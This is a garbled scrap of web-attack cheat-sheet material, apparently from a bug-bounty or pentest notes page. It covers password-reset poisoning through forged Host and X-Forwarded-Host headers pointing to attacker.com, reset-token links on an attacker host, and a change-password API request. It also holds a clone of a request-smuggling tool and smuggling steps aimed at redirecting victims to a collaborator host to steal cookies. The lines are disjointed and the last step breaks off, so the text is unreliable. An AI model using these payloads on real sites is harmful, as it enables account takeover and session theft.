[email protected] a
Host: attacker.com
, X-Forwarded-Host: attacker.com
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
https://attacker.com/reset-password.php?token=TOKEN
powershell POST /api/changepass [...] ("form": {"email":"[email protected]","password":"securepwd"})
resetToken
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
"admin "
*.domain.com
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Craft a request which will overwrite the POST / HTTP/1.1
with the following data:
GET http://something.burpcollaborator.net HTTP/1.1 X:
with the goal of open redirect the victims to burpcollab and steal their cookies
3. Final request could look like the following